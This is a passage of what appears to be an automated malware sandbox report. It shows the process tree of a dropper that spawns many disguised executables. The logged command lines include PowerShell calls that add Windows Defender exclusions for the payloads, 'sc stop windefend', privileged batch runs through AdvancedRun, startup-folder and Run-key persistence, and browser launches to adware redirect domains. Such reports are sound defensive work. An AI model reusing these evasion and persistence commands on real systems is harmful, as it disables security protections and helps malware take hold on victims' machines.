- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"C:\Users\Admin\Pictures\Adobe Films\024wC3SO_qVtbE4Y9Lz5RQz9.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"7⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5761cbdb-fc5c-47f0-a896-c7edc400f9a5\test.bat"9⤵
-
C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d30d5ea6-3d98-4d92-920e-4a454e98413a\test.bat"9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"8⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6cb215d3-6359-479f-9641-70b0faee0ee0\test.bat"10⤵
-
C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0249fd11-b809-48cc-bf7c-28ee4e94f895\test.bat"10⤵
-
C:\Windows\system32\sc.exesc stop windefend11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 89210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 89210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force9⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe" -Force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force8⤵
-
C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZP0MR34BkzoGGsDYhHusS489.exe"C:\Users\Admin\Pictures\Adobe Films\ZP0MR34BkzoGGsDYhHusS489.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\F37OFtk5v9UdORoY8t4Donzo.exe"C:\Users\Admin\Pictures\Adobe Films\F37OFtk5v9UdORoY8t4Donzo.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\9Zb2WtRSw11ACQNzk2XLqI6n.exe"C:\Users\Admin\Pictures\Adobe Films\9Zb2WtRSw11ACQNzk2XLqI6n.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\VaQQKPf9T577ZPDm1uawzRQO.exe"C:\Users\Admin\Pictures\Adobe Films\VaQQKPf9T577ZPDm1uawzRQO.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 2808⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Zx0htBgAf3gZhfn9rCPnpedY.exe"C:\Users\Admin\Pictures\Adobe Films\Zx0htBgAf3gZhfn9rCPnpedY.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\ZYQIPC2bbMYZliSoqUrEJ6Y4.exe"C:\Users\Admin\Documents\ZYQIPC2bbMYZliSoqUrEJ6Y4.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\bWw9uRskntfP17tKU1kXBdT2.exe"C:\Users\Admin\Pictures\Adobe Films\bWw9uRskntfP17tKU1kXBdT2.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\hhdys4K7UWyFNobqt4GlqiEh.exe"C:\Users\Admin\Pictures\Adobe Films\hhdys4K7UWyFNobqt4GlqiEh.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 27610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\RUc12BIkVlXMFW5crVQpYnzm.exe"C:\Users\Admin\Pictures\Adobe Films\RUc12BIkVlXMFW5crVQpYnzm.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 23610⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\Pictures\Adobe Films\_jBQw_QihoQim7DMOHzM16TN.exe"C:\Users\Admin\Pictures\Adobe Films\_jBQw_QihoQim7DMOHzM16TN.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\SPhHHgmoIuNWAEquliksedgo.exe"C:\Users\Admin\Pictures\Adobe Films\SPhHHgmoIuNWAEquliksedgo.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-84S07.tmp\LvP2JR61i9foyFZ2pnR1CRLZ.tmp"C:\Users\Admin\AppData\Local\Temp\is-84S07.tmp\LvP2JR61i9foyFZ2pnR1CRLZ.tmp" /SL5="$303EA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\LvP2JR61i9foyFZ2pnR1CRLZ.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-IME32.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IME32.tmp\ShareFolder.exe" /S /UID=271011⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\5d-3147c-c12-591b5-e8765c26e834d\Hamivapasi.exe"C:\Users\Admin\AppData\Local\Temp\5d-3147c-c12-591b5-e8765c26e834d\Hamivapasi.exe"12⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5VHNR.tmp\GVCbJgN4fvZ0RwrZvawYRPZB.tmp"C:\Users\Admin\AppData\Local\Temp\is-5VHNR.tmp\GVCbJgN4fvZ0RwrZvawYRPZB.tmp" /SL5="$60300,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GVCbJgN4fvZ0RwrZvawYRPZB.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-O98KM.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-O98KM.tmp\ShareFolder.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe"C:\Program Files\Windows Media Player\VWVYJDUJWQ\foldershare.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\7f-cddff-8ce-d14a4-239f101d723df\Qekymoshati.exe"C:\Users\Admin\AppData\Local\Temp\7f-cddff-8ce-d14a4-239f101d723df\Qekymoshati.exe"12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
